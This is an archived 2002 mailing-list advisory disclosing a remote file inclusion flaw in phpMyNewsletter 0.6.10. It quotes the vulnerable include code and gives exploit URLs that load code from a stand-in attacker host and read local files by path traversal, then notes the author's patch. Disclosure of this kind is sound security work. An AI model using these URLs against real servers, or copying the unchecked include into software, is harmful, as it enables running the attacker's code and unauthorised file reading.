Informations : °°°°°°°°°°°°°° Product : phpMyNewsletter Tested version : 0.6.10 Website : http://gregory.kokanosky.free.fr/phpmynewsletter/ Problem : include file PHP code : °°°°°°°°°° ---- /include/customize.php ---- <? $langfile = $l; include $l; ?> ---- /include/customize.php ---- Exploit : °°°°°°°°° http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World With in http://[attacker]/code.txt : <? echo $text; ?> or http://[target]/include/customize.php?l=../path/file/to/view Patch : °°°°°°° Autor has been alerted and last version (0.7beta1) has been patched. More details - in french : http://www.frog-man.org/tutos/phpMyNewsletter.txt - translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FphpMyNewsletter.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n
This archive was generated by hypermail 2b30 : Thu Oct 03 2002 - 20:58:16 PDT